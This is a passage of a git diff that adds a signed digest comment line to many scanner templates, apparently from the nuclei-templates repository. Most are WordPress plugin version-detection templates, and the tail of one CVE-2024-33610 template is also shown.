1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2024/CVE-2024-33610.yaml b/http/cves/2024/CVE-2024-33610.yaml index 5e0f1fbb07..6b26d397d8 100644 --- a/http/cves/2024/CVE-2024-33610.yaml +++ b/http/cves/2024/CVE-2024-33610.yaml @@ -51,3 +51,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022054e436e2ce49cfac1372996890038e5fb576f1f70ceef221a56e52b6cece19e9022035318cfd8350c6722f20e81d4231c4e12fc915b6d2cc272a27be9f7baec7e6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..15eddd772b 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d624bd84326dca61e246f972f495a5534bb6b5d022c76b569d810da13f5aeb45022100fa9f3049fe128fbc658184dbef94483903be0d6b6ec917a742495b4a50a10ab9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..0569c8afb7 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200ddff74ab9b38fa738abe7257fa11222932f210be1d1be045ab6eef787c0d9a4022100edc84f440c9b1fbf967c709dac63aca92f987e23625e59b9c23dbf2bc2607cb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..fd5fe22c6c 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f292b4b8cf8996aec6077f6bd537d618b6956823d683df7dfd4d66372561ac86022100ae71e9e54caeb3aa308125b17188513ac165d2da07fa35db487fb8df0b885140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..83ede16e28 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009580cc2900e229bc0e018445dc3b9afa955bf083fe93f7872fe074727310fa8d022100dcc0395ac9ca6a7ecaeb8a5ba4c2152d5117651f066ee546953872bf1319be34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..9bbece900e 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e65698e434f08bd35ba892e540eb569fc1189c45899a0914689fb420c4a78323022054e5200a2e840dc67d8b4c05939b8db24569b3434aad7cd9eb58451199735bc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..51a84e9c9b 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e681e7d27b33660adfdb5938af0acc3a2f3bfe1ea512c74e2acfba15cb2fd410220427b32914893df9e8dcea7f89958fdbcbd25ec2c85840b63482cf160590f229f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..90451ae019 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204115bab6f88e06d09063ba1775cec4c8d8e2cc1a2283b02e2c2f319b18edbec602206a87ada184224b4d003910e909234b3d68446482e173df2304e3e67b78a71f95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..1a029ed243 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d9186ac7303f98fe417e99a17855b1b63b206ac7a168853a9a2bf733d25d189022100dcca3154e2d8bc723cab1d5eaddded8f2bd26588ad95f9c329ecaef9a3fb7d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..4185196c3c 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026f21ec462ac820874cd71ef21ebde1eaa2a131f75a8c1b4899026ba54570dcb02206f1309188894d6ca56708632206528e5720ea63a9761b20918227edb2de42925:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..3e7b53ea39 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022014c30c5d522f3279910c698661a67947b62614a83df0fd3e645d23b5c0a8a95a022100e9e18a3429119b53f28846d0eb2b70016d00a81a034a532ca0dd22cb80a785e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..2db80ac293 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100841cacc56d978ddcb013c08695a3f19bee98c1a573907be39a7cf95320076869022022fe0b9da9cbf3073050c9bc85c33b7faf79aa48193e351e2431fbeb6b33f761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..0d4976f8dc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070a2859618715a6f03c36389cf8f0179c27fc9e00bf4335f317b7d9cd0278f5d022034d9d4cf31298ca79d534d9469938013e73dde78840ed4c1020a5f73a9560338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..a36c49bdad 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e59925563707540c31d06780f65a0c09b333d5d5ddeff9a9d533844c86076db5022100af9bab33878f862f0f9d730ddafa4aa14f2cc0d0b812ed25a4efdcbae842001b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..a99112ab20 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c95941015a5027f2223af04c443311715677789944b066da0b8553cc825615c022100ec280320ef0fc2e243dc47f1ef079482b8b1f52c7ba373f2f40b9c6c31f778e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..70f7ea5fd3 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022063011d963941ffb2ad5defd0d5c7dec3592dd17ec5261317a50d188b7071e0ab022100d04df6629d4763ed3e5c61149922305958d53f85523591a0123991737fbdc3c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..92abed5098 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d6c51299b71b07a42e48a38347edc1ea42549eb8c3203a46000817af414d7fee022051d5ad02e092747cb682f5817ea5365c48c1c9f33e5d8473147155ae6c453328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..bca7d6a70c 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bf201f8ed276b05fe3ef4af2842db8e25120c45c5618a5ac50d8d828f0f97d6022100de34692a4c6a0d3a21e405a32fb6da1f717d145f1b3a43c8f200b422f9ab763f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..8c90fcd1d8 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022016683176764dc731dae5eead9f4dcf9d109606c350a897dbdff83db357d05759022060042232633619f1c93473aaec7cf2f40dcaba03af3ac1e07c952b19e44ea5a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..abae0f1cb2 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da22d59038fd2a88a36240998159a883590e4dc7eb37875dc14136cfc2569f6f02200aa96c3d9390cda4e0f8b08dee8e86a9cca221ab09c6f070e9504eec3c643fae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..60a0eaefe6 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fb221de3ad3e57bfa069a6cdf516704af2ac4239e88505bde7b5fdb27cbd287f0221008eba7dacee57096a18fdac69167d9a107c1dbb77b9aec0148986a685f1927531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..f6e3d89944 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b1b69914c23f3ea507e8b6caad1af674f063dadbb6d9b5717df29362e868746c02202fd563c1f69141a85abd7f624be9aeb5b3fe487a7ad8f412041ec74ef8ec77d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..46a4d8a269 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100931277bd3c8b456d29d1af9a5401e62c734c99379e54637e51c8f0182089e75702210096e43ecfb7e4b72fd3d9895b4f1e72fb3e34306aeb7889fb949145d013f1f696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..beac37bd6d 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d44dfc4b4e004202878a5d995382e325d5fbc6274c284420676d9a376c855b6022100cc6a0f9575e01b8232203ca39f6a6b4dfdad9c197943c9665364275c8358e915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..225d1fc258 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204057054982c186824c9a2a5a26bb99f270e72b156ae9bbf8fe07570fb80ec73702206b84173291087e7d44374d09b87c0470c55dc861e016f78c79887bcf3aac520d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..46089b7aab 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008d1e106d4220f50c1de932439eac28c514f9cbbd0f1d67e5fc90d26a4e29645f02205c4e478de3ba5ebe8d2a1e3499f90e894c259b3bc38e89948519020ee7d08014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..2e879b5da3 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210096e543992870e6945f697528ab36f06b0ad8002ab46d57a4ced73959acbf08ad0220351d4e929c0c499d09fe3d73051ed7bbb12a9b8d445a0469ef517c2392e67259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..f8258c0c34 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c78a37298c87c0d45001e553d77a5eb8bee8aa4c3eac871e25db8f0aa9d6766b022025c3b05b728c358f92cf850f7150cbdf7b177d6d41bb4f4d419493eb924bf1c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..2b4d958f44 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049110991c61986e598239a6eb54c20258e6a33977b52f5893eb1d98a2fcf441e022100bd2837075aeb0fea4a7db491593620cd542b08dd4d38acb4ee65015f4b23e3d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..3738a37213 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d2eb9074389e54c21c1051449f589283003de549794593aa583aa6b91b8f85f1022100ab75b7e25fc44771b9e913fa52f106f35c841ed2f95447cdbc0af9812af004ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..add2c61c4a 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220165a375f89f64c2a8ce37889202148d404925f5edeea9fe7ca87e2e57a49362c0220366b2938eb0a470ed98acba13c06a49c046cb6776ca0bd611cd8deaf948f885b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..37ca294f3d 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100feadbd8352ce6f678113ea88be1581d5c31e509880995fc38911b50adf65d26402206cd80a677c6a2b1b22345f56ff9dda8a3de3031eebe647fea9db7ee0e2dac02d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..c316bea25d 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022042a843d719dd0ef2bc9531132d80fbf6edcc9cf08f769d40a67de874262dd17102202d44541bb93e95482eb0345fda58967fe15196d2c821844c62cd4125793ebc0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..064ce6e333 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2f8ec633d8a483cf99e5dde67bf6a56bc60bbf3bb271917bee855a6cfa55bd1022100cbda6cee4d5b06fdb63d00e2f5e344494d5cde4fbbcbdbae8ece5ab1690079e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..f8f0ed20cf 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012ff54bf4da5747ea34a4f62f1dfddb621c4dcce6db3e615531933bac0cb0c6e02210096dd50286b2887f035beb1ca9e559bee0bac5f8d3088b95355986b93bb93e91c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..ccc9bc278a 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100972f98b31fc7cfbcafdf469b3bbc5cd13bd3c6eaa3240afa0d7510a910ad3a71022100bb3590bbb932ac7cf6b54076c5f804fb1ba6eb45c7ee01cfa9188ac63a5708df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..eb2f8aa5a1 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207cb5c4453effb67ef13e80f0235a3c16a6ece5e8aea5a8351e0b62334416bad8022100bbad75aff03eb006599eccab5dd8d00222770f744288daeecd540da76970e47a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..2d50fea0e6 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100af0166691b0fcf0715434aaa303914e26ad1f6bd6f85db06f75eada9b9c2e6ca02207030a2df6a95f8886f7f1d825c9a879c6230adaa65af24414e6a99bfab298b3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..97c5f1561c 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e230e672a769463e1709fcf6bc701c871cbfd387bff057bf5721601d927a46b50220244377928b84f545b0230195d54a4ea052ee715ba19b07a9e9c19b406813fa69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..8dcb3aaa8c 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc214e0dd89cf1561591081cc4a7e658fac030d9cf532336e7a4e2427b5342a9022051f0ec327508bebaac76edfb96f2bcbc5555cf26dc13ffab90a47d419ee4ab2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..9138370679 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ca03d4fb34789fec3ee6b33fa401b6466a633babf69fb8960eb2c146c1556f50220400a3744d23be074d43c5041f88cde6c16ecf8ea6564642a4cd1c3a469fcb7bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..b4ad2c6ae3 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200f88bf63e43a73ad68419bd8985db449f37f8ce28dbc4a3506647c55f09462d6022100f63886e08cd0047d80addc3ab1c582f152938372dc9af72dcaac498371bd4dbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..cd1b13bec2 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5d6ba75c9de4d55d1d6d97f6bce3aa8a42f00ea4aa3221f764f1ef42d8c28a7022100adfe61c2c7f413cff541b7cd474bd7f92cf96ba574ef9d70a72a0f19754bc0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..83c58198ba 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b991880c6c055dd1539e6d628e23b8de116996ba57f63de8782230676ef1b226022100f50bb35db2ac127d1cb923b208599e73de5581ac37905fce00f1c9c104c8311d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..64797210cf 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 